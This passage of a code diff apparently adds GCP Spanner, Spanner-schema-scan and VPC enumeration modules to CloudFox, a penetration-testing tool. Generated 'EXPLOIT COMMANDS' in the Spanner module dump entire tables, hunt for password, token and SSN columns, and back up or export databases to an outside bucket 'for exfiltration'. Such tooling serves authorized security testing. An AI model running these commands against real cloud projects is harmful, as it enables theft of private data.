+Features: +- Lists all Spanner instances with configuration details +- Shows databases within each instance with encryption info +- Enumerates IAM bindings at both instance and database levels +- Generates gcloud commands for further analysis`, + Run: runGCPSpannerCommand, +} + +type SpannerModule struct { + gcpinternal.BaseGCPModule + ProjectInstances map[string][]spannerservice.SpannerInstanceInfo // projectID -> instances + ProjectDatabases map[string][]spannerservice.SpannerDatabaseInfo // projectID -> databases + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex +} + +type SpannerOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o SpannerOutput) TableFiles() []internal.TableFile { return o.Table } +func (o SpannerOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPSpannerCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_SPANNER_MODULE_NAME) + if err != nil { + return + } + + module := &SpannerModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectInstances: make(map[string][]spannerservice.SpannerInstanceInfo), + ProjectDatabases: make(map[string][]spannerservice.SpannerDatabaseInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *SpannerModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SPANNER_MODULE_NAME, m.processProject) + + allInstances := m.getAllInstances() + allDatabases := m.getAllDatabases() + + if len(allInstances) == 0 { + logger.InfoM("No Spanner instances found", globals.GCP_SPANNER_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d Spanner instance(s) with %d database(s)", + len(allInstances), len(allDatabases)), globals.GCP_SPANNER_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *SpannerModule) getAllInstances() []spannerservice.SpannerInstanceInfo { + var all []spannerservice.SpannerInstanceInfo + for _, instances := range m.ProjectInstances { + all = append(all, instances...) + } + return all +} + +func (m *SpannerModule) getAllDatabases() []spannerservice.SpannerDatabaseInfo { + var all []spannerservice.SpannerDatabaseInfo + for _, databases := range m.ProjectDatabases { + all = append(all, databases...) + } + return all +} + +func (m *SpannerModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Spanner in project: %s", projectID), globals.GCP_SPANNER_MODULE_NAME) + } + + svc := spannerservice.New() + result, err := svc.ListInstancesAndDatabases(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_SPANNER_MODULE_NAME, + fmt.Sprintf("Could not list Spanner instances in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectInstances[projectID] = result.Instances + m.ProjectDatabases[projectID] = result.Databases + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["spanner-commands"] = &internal.LootFile{ + Name: "spanner-commands", + Contents: "# Spanner Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + + for _, instance := range result.Instances { + m.addInstanceToLoot(projectID, instance) + } + for _, database := range result.Databases { + m.addDatabaseToLoot(projectID, database) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d instance(s) and %d database(s) in project %s", + len(result.Instances), len(result.Databases), projectID), globals.GCP_SPANNER_MODULE_NAME) + } +} + +func (m *SpannerModule) addInstanceToLoot(projectID string, instance spannerservice.SpannerInstanceInfo) { + lootFile := m.LootMap[projectID]["spanner-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# INSTANCE: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Display Name: %s\n"+ + "# Config: %s\n"+ + "# Nodes: %d\n"+ + "# State: %s\n", + instance.Name, instance.ProjectID, + instance.DisplayName, instance.Config, + instance.NodeCount, instance.State, + ) + + if len(instance.IAMBindings) > 0 { + lootFile.Contents += "# IAM Bindings:\n" + for _, binding := range instance.IAMBindings { + lootFile.Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) + } + } + + lootFile.Contents += fmt.Sprintf( + "\n# Describe instance:\n"+ + "gcloud spanner instances describe %s --project=%s\n\n"+ + "# List databases:\n"+ + "gcloud spanner databases list --instance=%s --project=%s\n\n"+ + "# Get IAM policy:\n"+ + "gcloud spanner instances get-iam-policy %s --project=%s\n\n", + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, + ) +} + +func (m *SpannerModule) addDatabaseToLoot(projectID string, database spannerservice.SpannerDatabaseInfo) { + lootFile := m.LootMap[projectID]["spanner-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# -----------------------------------------------------------------------------\n"+ + "# DATABASE: %s (Instance: %s)\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# Project: %s\n"+ + "# State: %s\n"+ + "# Encryption: %s\n", + database.Name, database.InstanceName, + database.ProjectID, database.State, + database.EncryptionType, + ) + + if database.KmsKeyName != "" { + lootFile.Contents += fmt.Sprintf("# KMS Key: %s\n", database.KmsKeyName) + } + + if len(database.IAMBindings) > 0 { + lootFile.Contents += "# IAM Bindings:\n" + for _, binding := range database.IAMBindings { + lootFile.Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) + } + } + + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe database: +gcloud spanner databases describe %s --instance=%s --project=%s + +# Get database IAM policy: +gcloud spanner databases get-iam-policy %s --instance=%s --project=%s + +# List all tables: +gcloud spanner databases execute-sql %s --instance=%s --project=%s --sql="SELECT * FROM INFORMATION_SCHEMA.TABLES" + +# List all columns for all tables: +gcloud spanner databases execute-sql %s --instance=%s --project=%s --sql="SELECT TABLE_NAME, COLUMN_NAME, SPANNER_TYPE FROM INFORMATION_SCHEMA.COLUMNS ORDER BY TABLE_NAME" + +# List indexes: +gcloud spanner databases execute-sql %s --instance=%s --project=%s --sql="SELECT * FROM INFORMATION_SCHEMA.INDEXES" + +# Get DDL (schema dump): +gcloud spanner databases ddl describe %s --instance=%s --project=%s + +`, + database.Name, database.InstanceName, database.ProjectID, + database.Name, database.InstanceName, database.ProjectID, + database.Name, database.InstanceName, database.ProjectID, + database.Name, database.InstanceName, database.ProjectID, + database.Name, database.InstanceName, database.ProjectID, + database.Name, database.InstanceName, database.ProjectID, + ) + + // === EXPLOIT COMMANDS === + lootFile.Contents += fmt.Sprintf( + "# === EXPLOIT COMMANDS ===\n\n"+ + "# Dump data from tables (replace TABLE_NAME):\n"+ + "gcloud spanner databases execute-sql %s --instance=%s --project=%s --sql=\"SELECT * FROM TABLE_NAME LIMIT 100\"\n\n"+ + "# Dump all rows from a table:\n"+ + "gcloud spanner databases execute-sql %s --instance=%s --project=%s --sql=\"SELECT * FROM TABLE_NAME\" --format=json > /tmp/spanner-dump.json\n\n"+ + "# Search for sensitive data patterns:\n"+ + "gcloud spanner databases execute-sql %s --instance=%s --project=%s --sql=\"SELECT TABLE_NAME, COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE LOWER(COLUMN_NAME) LIKE '%%password%%' OR LOWER(COLUMN_NAME) LIKE '%%secret%%' OR LOWER(COLUMN_NAME) LIKE '%%token%%' OR LOWER(COLUMN_NAME) LIKE '%%key%%' OR LOWER(COLUMN_NAME) LIKE '%%credit%%' OR LOWER(COLUMN_NAME) LIKE '%%ssn%%'\"\n\n"+ + "# Create a backup (for exfiltration):\n"+ + "gcloud spanner backups create cloudfox-backup --instance=%s --database=%s --project=%s --expiration-date=$(date -u -d '+7 days' '+%%Y-%%m-%%dT%%H:%%M:%%SZ') --async\n\n"+ + "# Export database to GCS:\n"+ + "gcloud spanner databases export %s --instance=%s --project=%s --output-uri=gs://BUCKET_NAME/spanner-export/\n\n", + database.Name, database.InstanceName, database.ProjectID, + database.Name, database.InstanceName, database.ProjectID, + database.Name, database.InstanceName, database.ProjectID, + database.InstanceName, database.Name, database.ProjectID, + database.Name, database.InstanceName, database.ProjectID, + ) +} + +func (m *SpannerModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *SpannerModule) getInstanceHeader() []string { + return []string{ + "Project", + "Instance", + "Display Name", + "Config", + "Nodes", + "State", + "IAM Binding Role", + "IAM Binding Principal", + } +} + +func (m *SpannerModule) getDatabaseHeader() []string { + return []string{ + "Project", + "Instance", + "Database", + "State", + "Encryption", + "KMS Key", + "IAM Binding Role", + "IAM Binding Principal", + } +} + +func (m *SpannerModule) instancesToTableBody(instances []spannerservice.SpannerInstanceInfo) [][]string { + var body [][]string + for _, instance := range instances { + if len(instance.IAMBindings) > 0 { + for _, binding := range instance.IAMBindings { + body = append(body, []string{ + m.GetProjectName(instance.ProjectID), + instance.Name, + instance.DisplayName, + instance.Config, + fmt.Sprintf("%d", instance.NodeCount), + instance.State, + binding.Role, + binding.Member, + }) + } + } else { + // Instance with no IAM bindings + body = append(body, []string{ + m.GetProjectName(instance.ProjectID), + instance.Name, + instance.DisplayName, + instance.Config, + fmt.Sprintf("%d", instance.NodeCount), + instance.State, + "-", + "-", + }) + } + } + return body +} + +func (m *SpannerModule) databasesToTableBody(databases []spannerservice.SpannerDatabaseInfo) [][]string { + var body [][]string + for _, database := range databases { + kmsKey := "-" + if database.KmsKeyName != "" { + kmsKey = database.KmsKeyName + } + + if len(database.IAMBindings) > 0 { + for _, binding := range database.IAMBindings { + body = append(body, []string{ + m.GetProjectName(database.ProjectID), + database.InstanceName, + database.Name, + database.State, + database.EncryptionType, + kmsKey, + binding.Role, + binding.Member, + }) + } + } else { + // Database with no IAM bindings + body = append(body, []string{ + m.GetProjectName(database.ProjectID), + database.InstanceName, + database.Name, + database.State, + database.EncryptionType, + kmsKey, + "-", + "-", + }) + } + } + return body +} + +func (m *SpannerModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if instances, ok := m.ProjectInstances[projectID]; ok && len(instances) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "spanner-instances", + Header: m.getInstanceHeader(), + Body: m.instancesToTableBody(instances), + }) + } + + if databases, ok := m.ProjectDatabases[projectID]; ok && len(databases) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "spanner-databases", + Header: m.getDatabaseHeader(), + Body: m.databasesToTableBody(databases), + }) + } + + return tableFiles +} + +func (m *SpannerModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Get all project IDs that have data + projectIDs := make(map[string]bool) + for projectID := range m.ProjectInstances { + projectIDs[projectID] = true + } + for projectID := range m.ProjectDatabases { + projectIDs[projectID] = true + } + + for projectID := range projectIDs { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = SpannerOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_SPANNER_MODULE_NAME) + } +} + +func (m *SpannerModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allInstances := m.getAllInstances() + allDatabases := m.getAllDatabases() + + var tables []internal.TableFile + + if len(allInstances) > 0 { + tables = append(tables, internal.TableFile{ + Name: "spanner-instances", + Header: m.getInstanceHeader(), + Body: m.instancesToTableBody(allInstances), + }) + } + + if len(allDatabases) > 0 { + tables = append(tables, internal.TableFile{ + Name: "spanner-databases", + Header: m.getDatabaseHeader(), + Body: m.databasesToTableBody(allDatabases), + }) + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := SpannerOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SPANNER_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/spannerenum.go b/gcp/commands/spannerenum.go new file mode 100644 index 00000000..edab5eef --- /dev/null +++ b/gcp/commands/spannerenum.go @@ -0,0 +1,247 @@ +package commands + +import ( + "context" + "fmt" + "sync" + + spannerenumservice "github.com/BishopFox/cloudfox/gcp/services/spannerEnumService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPSpannerEnumCommand = &cobra.Command{ + Use: globals.GCP_SPANNERENUM_MODULE_NAME, + Aliases: []string{"spanner-scan"}, + Short: "Scan Spanner database schemas for sensitive table and column names", + Long: `Scan Spanner database DDL for potentially sensitive data. + +Retrieves DDL (CREATE TABLE statements) from all Spanner databases and parses +table names and column names, checking them against sensitive data patterns. + +Detects resources with names suggesting they store: +- Credentials, tokens, or secrets +- PII (SSN, credit cards) +- Financial data (payments, billing, salary) +- Compliance-labeled data (HIPAA, GDPR, PII)`, + Run: runGCPSpannerEnumCommand, +} + +type SpannerEnumModule struct { + gcpinternal.BaseGCPModule + ProjectResources map[string][]spannerenumservice.SensitiveSpannerResource + LootMap map[string]map[string]*internal.LootFile + mu sync.Mutex +} + +type SpannerEnumOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o SpannerEnumOutput) TableFiles() []internal.TableFile { return o.Table } +func (o SpannerEnumOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPSpannerEnumCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_SPANNERENUM_MODULE_NAME) + if err != nil { + return + } + + module := &SpannerEnumModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectResources: make(map[string][]spannerenumservice.SensitiveSpannerResource), + LootMap: make(map[string]map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *SpannerEnumModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Scanning Spanner database schemas for sensitive data indicators...", globals.GCP_SPANNERENUM_MODULE_NAME) + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SPANNERENUM_MODULE_NAME, m.processProject) + + allResources := m.getAllResources() + if len(allResources) == 0 { + logger.InfoM("No sensitive Spanner resources found", globals.GCP_SPANNERENUM_MODULE_NAME) + return + } + + criticalCount := 0 + highCount := 0 + for _, r := range allResources { + switch r.RiskLevel { + case "CRITICAL": + criticalCount++ + case "HIGH": + highCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d sensitive Spanner resources (%d CRITICAL, %d HIGH)", + len(allResources), criticalCount, highCount), globals.GCP_SPANNERENUM_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +func (m *SpannerEnumModule) getAllResources() []spannerenumservice.SensitiveSpannerResource { + var all []spannerenumservice.SensitiveSpannerResource + for _, resources := range m.ProjectResources { + all = append(all, resources...) + } + return all +} + +func (m *SpannerEnumModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Scanning Spanner in project: %s", projectID), globals.GCP_SPANNERENUM_MODULE_NAME) + } + + svc := spannerenumservice.New() + + resources, err := svc.EnumerateSensitiveResources(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_SPANNERENUM_MODULE_NAME, + fmt.Sprintf("Could not scan Spanner in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectResources[projectID] = resources + + if len(resources) > 0 { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + lootFile := &internal.LootFile{ + Name: "spanner-enum-commands", + Contents: "# Spanner Commands for Sensitive Resources\n# Generated by CloudFox\n\n", + } + for _, r := range resources { + if r.Table != "" { + lootFile.Contents += fmt.Sprintf( + "# [%s] %s - %s/%s/%s\n# %s\ngcloud spanner databases execute-sql %s --instance=%s --project=%s --sql='SELECT * FROM %s LIMIT 10'\n\n", + r.RiskLevel, r.Category, r.Instance, r.Database, r.Table, + r.Description, + r.Database, r.Instance, projectID, r.Table, + ) + } + } + m.LootMap[projectID]["spanner-enum-commands"] = lootFile + } + m.mu.Unlock() +} + +func (m *SpannerEnumModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeSpannerHierarchicalOutput(ctx, logger) + } else { + m.writeSpannerFlatOutput(ctx, logger) + } +} + +func (m *SpannerEnumModule) getHeader() []string { + return []string{"Project", "Instance", "Database", "Table", "Column", "Category", "Risk Level", "Description"} +} + +func (m *SpannerEnumModule) resourcesToTableBody(resources []spannerenumservice.SensitiveSpannerResource) [][]string { + var body [][]string + for _, r := range resources { + body = append(body, []string{ + m.GetProjectName(r.ProjectID), + r.Instance, + r.Database, + r.Table, + r.Column, + r.Category, + r.RiskLevel, + r.Description, + }) + } + return body +} + +func (m *SpannerEnumModule) buildTablesForProject(projectID string) []internal.TableFile { + resources := m.ProjectResources[projectID] + if len(resources) == 0 { + return nil + } + return []internal.TableFile{ + { + Name: "spanner-enum", + Header: m.getHeader(), + Body: m.resourcesToTableBody(resources), + }, + } +} + +func (m *SpannerEnumModule) writeSpannerHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID, resources := range m.ProjectResources { + if len(resources) == 0 { + continue + } + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = SpannerEnumOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_SPANNERENUM_MODULE_NAME) + } +} + +func (m *SpannerEnumModule) writeSpannerFlatOutput(ctx context.Context, logger internal.Logger) { + allResources := m.getAllResources() + if len(allResources) == 0 { + return + } + + tables := []internal.TableFile{ + { + Name: "spanner-enum", + Header: m.getHeader(), + Body: m.resourcesToTableBody(allResources), + }, + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := SpannerEnumOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SPANNERENUM_MODULE_NAME) + } +} diff --git a/gcp/commands/vpcnetworks.go b/gcp/commands/vpcnetworks.go new file mode 100644 index 00000000..1f2f7a23 --- /dev/null +++ b/gcp/commands/vpcnetworks.go @@ -0,0 +1,640 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + diagramservice "github.com/BishopFox/cloudfox/gcp/services/diagramService" + vpcservice "github.com/BishopFox/cloudfox/gcp/services/vpcService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPVPCNetworksCommand = &cobra.Command{ + Use: globals.GCP_VPCNETWORKS_MODULE_NAME, + Aliases: []string{"vpc", "networks", "net"}, + Short: "Enumerate VPC Networks", + Long: `Enumerate VPC Networks and related configurations. + +Features: +- Lists all VPC networks and subnets +- Shows VPC peering connections +- Analyzes routing tables +- Checks for Private Google Access +- Identifies flow log configuration`, + Run: runGCPVPCNetworksCommand, +} + +type VPCNetworksModule struct { + gcpinternal.BaseGCPModule + ProjectNetworks map[string][]vpcservice.VPCNetworkInfo // projectID -> networks + ProjectSubnets map[string][]vpcservice.SubnetInfo // projectID -> subnets + ProjectPeerings map[string][]vpcservice.VPCPeeringInfo // projectID -> peerings + ProjectRoutes map[string][]vpcservice.RouteInfo // projectID -> routes + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex +} + +type VPCNetworksOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o VPCNetworksOutput) TableFiles() []internal.TableFile { return o.Table } +func (o VPCNetworksOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPVPCNetworksCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_VPCNETWORKS_MODULE_NAME) + if err != nil { + return + } + + module := &VPCNetworksModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectNetworks: make(map[string][]vpcservice.VPCNetworkInfo), + ProjectSubnets: make(map[string][]vpcservice.SubnetInfo), + ProjectPeerings: make(map[string][]vpcservice.VPCPeeringInfo), + ProjectRoutes: make(map[string][]vpcservice.RouteInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *VPCNetworksModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_VPCNETWORKS_MODULE_NAME, m.processProject) + + allNetworks := m.getAllNetworks() + allSubnets := m.getAllSubnets() + allPeerings := m.getAllPeerings() + allRoutes := m.getAllRoutes() + + if len(allNetworks) == 0 { + logger.InfoM("No VPC networks found", globals.GCP_VPCNETWORKS_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d VPC network(s), %d subnet(s), %d peering(s), %d route(s)", + len(allNetworks), len(allSubnets), len(allPeerings), len(allRoutes)), globals.GCP_VPCNETWORKS_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *VPCNetworksModule) getAllNetworks() []vpcservice.VPCNetworkInfo { + var all []vpcservice.VPCNetworkInfo + for _, networks := range m.ProjectNetworks { + all = append(all, networks...) + } + return all +} + +func (m *VPCNetworksModule) getAllSubnets() []vpcservice.SubnetInfo { + var all []vpcservice.SubnetInfo + for _, subnets := range m.ProjectSubnets { + all = append(all, subnets...) + } + return all +} + +func (m *VPCNetworksModule) getAllPeerings() []vpcservice.VPCPeeringInfo { + var all []vpcservice.VPCPeeringInfo + for _, peerings := range m.ProjectPeerings { + all = append(all, peerings...) + } + return all +} + +func (m *VPCNetworksModule) getAllRoutes() []vpcservice.RouteInfo { + var all []vpcservice.RouteInfo + for _, routes := range m.ProjectRoutes { + all = append(all, routes...) + } + return all +} + +func (m *VPCNetworksModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating VPC networks in project: %s", projectID), globals.GCP_VPCNETWORKS_MODULE_NAME) + } + + svc := vpcservice.New() + + m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["vpcnetworks-commands"] = &internal.LootFile{ + Name: "vpcnetworks-commands", + Contents: "# VPC Networks Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n# See also: network-topology-commands for comprehensive topology with NAT/SharedVPC\n\n", + } + } + m.mu.Unlock() + + // Get networks + networks, err := svc.ListVPCNetworks(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_VPCNETWORKS_MODULE_NAME, + fmt.Sprintf("Could not list VPC networks in project %s", projectID)) + } else { + m.mu.Lock() + m.ProjectNetworks[projectID] = networks + for _, network := range networks { + m.addNetworkToLoot(projectID, network) + } + m.mu.Unlock() + } + + // Get subnets + subnets, err := svc.ListSubnets(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_VPCNETWORKS_MODULE_NAME, + fmt.Sprintf("Could not list subnets in project %s", projectID)) + } else { + m.mu.Lock() + m.ProjectSubnets[projectID] = subnets + for _, subnet := range subnets { + m.addSubnetToLoot(projectID, subnet) + } + m.mu.Unlock() + } + + // Get peerings + peerings, err := svc.ListVPCPeerings(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_VPCNETWORKS_MODULE_NAME, + fmt.Sprintf("Could not list VPC peerings in project %s", projectID)) + } else { + m.mu.Lock() + m.ProjectPeerings[projectID] = peerings + for _, peering := range peerings { + m.addPeeringToLoot(projectID, peering) + } + m.mu.Unlock() + } + + // Get routes + routes, err := svc.ListRoutes(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_VPCNETWORKS_MODULE_NAME, + fmt.Sprintf("Could not list routes in project %s", projectID)) + } else { + m.mu.Lock() + m.ProjectRoutes[projectID] = routes + m.mu.Unlock() + } +} + +func (m *VPCNetworksModule) addNetworkToLoot(projectID string, network vpcservice.VPCNetworkInfo) { + lootFile := m.LootMap[projectID]["vpcnetworks-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# NETWORK: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Routing Mode: %s\n"+ + "# Auto Create Subnets: %v\n"+ + "# Subnets: %d\n"+ + "# Peerings: %d\n"+ + "\n# Describe network:\n"+ + "gcloud compute networks describe %s --project=%s\n\n"+ + "# List subnets in network:\n"+ + "gcloud compute networks subnets list --network=%s --project=%s\n\n"+ + "# List peerings:\n"+ + "gcloud compute networks peerings list --network=%s --project=%s\n\n", + network.Name, + network.ProjectID, + network.RoutingMode, + network.AutoCreateSubnetworks, + len(network.Subnetworks), + len(network.Peerings), + network.Name, network.ProjectID, + network.Name, network.ProjectID, + network.Name, network.ProjectID, + ) +} + +func (m *VPCNetworksModule) addSubnetToLoot(projectID string, subnet vpcservice.SubnetInfo) { + lootFile := m.LootMap[projectID]["vpcnetworks-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# -----------------------------------------------------------------------------\n"+ + "# SUBNET: %s (Network: %s)\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# Project: %s\n"+ + "# Region: %s\n"+ + "# CIDR: %s\n"+ + "# Private Google Access: %v\n"+ + "# Flow Logs: %v\n"+ + "\n# Describe subnet:\n"+ + "gcloud compute networks subnets describe %s --region=%s --project=%s\n\n", + subnet.Name, subnet.Network, + subnet.ProjectID, + subnet.Region, + subnet.IPCidrRange, + subnet.PrivateIPGoogleAccess, + subnet.EnableFlowLogs, + subnet.Name, subnet.Region, subnet.ProjectID, + ) +} + +func (m *VPCNetworksModule) addPeeringToLoot(projectID string, peering vpcservice.VPCPeeringInfo) { + lootFile := m.LootMap[projectID]["vpcnetworks-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# -----------------------------------------------------------------------------\n"+ + "# PEERING: %s\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# Project: %s\n"+ + "# Network: %s -> Peer Network: %s\n"+ + "# Peer Project: %s\n"+ + "# State: %s\n"+ + "# Export Routes: %v, Import Routes: %v\n", + peering.Name, + peering.ProjectID, + peering.Network, peering.PeerNetwork, + peering.PeerProjectID, + peering.State, + peering.ExportCustomRoutes, peering.ImportCustomRoutes, + ) + + // Cross-project peering commands + if peering.PeerProjectID != "" && peering.PeerProjectID != peering.ProjectID { + lootFile.Contents += fmt.Sprintf( + "\n# Cross-project peering - enumerate peer project:\n"+ + "gcloud compute instances list --project=%s\n"+ + "gcloud compute networks subnets list --project=%s\n\n", + peering.PeerProjectID, + peering.PeerProjectID, + ) + } else { + lootFile.Contents += "\n" + } +} + +func (m *VPCNetworksModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Generate ASCII diagram and add to loot + diagram := m.generateVPCNetworksDiagram() + if diagram != "" { + // Add diagram to the first project's loot + for projectID := range m.LootMap { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + 